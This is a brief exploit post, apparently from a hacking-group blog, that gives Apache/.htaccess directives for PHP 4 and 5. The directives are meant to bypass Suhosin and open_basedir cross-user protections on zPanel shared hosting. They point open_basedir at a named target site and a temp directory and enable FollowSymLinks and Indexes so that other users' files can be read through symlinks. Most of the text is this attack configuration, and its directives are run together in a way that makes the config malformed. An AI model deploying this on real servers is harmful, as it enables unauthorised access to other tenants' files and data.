#Title:Bypass MOD_PHP Symlink From Sihosin Patch
#Description:Symlink Server By Escaping MOD_PHP and Turning off the Cross-user Security to any another Path.
#Data:30/10/2013
#Auhor:Mauritania Attacker & Virusa Worm
#Greetz:All AnonGhost Memberz
/var/zpanel/hostdata/ ====> Path of Websites.
/zadmin/public_html/webmail_mydomain_com ====> our Target.
/var/zpanel/temp/ =====> Path where we can read our Bypass.
#For PHP Version 5
<IfModule mod_php5.c>
php_admin_value open_basedir
"/var/zpanel/hostdata/zadmin/public_html/webmail_mydomain_com:/var/zpanel/temp/"
php_admin_value suhosin.executor.func.blacklist "passthru, show_source, shell_exec, system, pcntl_exec, popen, pclose,
proc_open, proc_nice, proc_terminate, proc_get_status, proc_close, leak, apache_child_terminate, posix_kill,
posix_mkfifo, posix_setpgid, posix_setsid, posix_setuid, escapeshellcmd, escapeshellarg, exec" Options
FollowSymLinks Indexes AllowOverride All Order Allow,Deny Allow from all
</IfModule>
#For PHP Version 4
<IfModule mod_php4.c>
php_admin_value open_basedir
"/var/zpanel/hostdata/zadmin/public_html/webmail_mydomain_com:/var/zpanel/temp/"
php_admin_value suhosin.executor.func.blacklist "passthru, show_source, shell_exec, system, pcntl_exec, popen, pclose,
proc_open, proc_nice, proc_terminate, proc_get_status, proc_close, leak, apache_child_terminate, posix_kill,
posix_mkfifo, posix_setpgid, posix_setsid, posix_setuid, escapeshellcmd, escapeshellarg, exec" Options
FollowSymLinks Indexes AllowOverride All Order Allow,Deny Allow from all
</IfModule>
Đăng ký:
Đăng Nhận xét (Atom)
Đăng nhận xét Blogger Facebook